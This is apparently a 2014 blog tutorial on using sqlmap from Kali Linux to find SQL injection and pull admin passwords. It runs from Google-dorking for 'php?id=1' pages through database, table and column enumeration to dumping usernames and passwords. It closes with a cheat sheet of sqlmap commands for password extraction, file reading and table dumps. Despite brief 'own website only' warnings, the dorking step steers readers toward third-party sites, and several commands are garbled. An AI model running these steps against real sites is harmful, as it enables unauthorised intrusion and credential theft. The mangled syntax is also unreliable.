Skip to content
Tags

, ,

Kali Linux How To Use SQLmap for SQL Injection – Find Website Admin Password

01/02/2014

How to test if a website is vulnerable to SQL injection.  To be legal, use your own website.

Step 1 – Google for php?=id1

Google for php?=id1

add a Single quote… to the end of the URL.

so it reads php?=id1′

If you get an error the website is vulnerable.   Go to step 2.

If this is your own website – shut it down immediately.  You need to secure it before you bring it back online.

******

Step 2 – Kali SQLMAP – get website databases

SQLMAP   – u http:\\website.com/page.php?id=1 –dbs

This will fetch all available databases on the website.  Did you see them listed?

******

Step 3 – Find the LOGIN table

SQLMAP   – u http:\\website.com/page.php?id=1 –D www – tables

Did you see all the TABLES on the website list out?

Look for likely targets… eg Login, username or password table.

If you’re not on your own website, or a best friends website (who’s sat next to you), you are into illegal terrority. STOP now!!

******

Step 4 – Get all the Login Data (from Step 3)

SQLMAP   – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login –columns

This should display columns with items such as Cookie, ID, IP, Password, Username.

******

Step 5 – Get Usernames (& Admin)

SQLMAP   – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C username –dump

Look for “admin”

*****

Step 6 – Get Passwords (of Admin)

SQLMAP   – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C password –dump

That’s it.

Game over!

 

****

SQLMap Examples

COMMAND DESCRIPTION
sqlmap -u http://meh.com --forms --batch --crawl=10
--cookie=jsessionid=54321 --level=5 --risk=3		 Automated sqlmap scan
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE
--level=3 --current-user --current-db --passwords
--file-read="/var/www/blah.php" 		Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1"
--dbms=mysql --tech=U --random-agent --dump 		Scan url for union + error based injection with mysql backend
and use a random user agent + database dump
sqlmap -o -u "http://meh.com/form/" --forms sqlmap check form for injection
sqlmap -o -u "http://meh/vuln-form" --forms
-D database-name -T users --dump		 sqlmap dump and crack hashes for table users on database-name.

Reference:

Pen Testing Cheat Sheet

https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/

From → BackTrack, Hacking, KALI, Uncategorized

Leave a comment

«
»